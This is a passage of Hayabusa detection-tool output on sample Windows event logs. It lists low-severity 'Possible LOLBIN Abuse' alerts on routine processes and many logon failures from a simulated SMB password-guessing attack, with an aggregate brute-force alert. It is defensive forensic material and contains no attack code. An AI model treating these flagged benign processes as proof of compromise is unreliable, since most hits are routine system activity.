Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,- 2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: 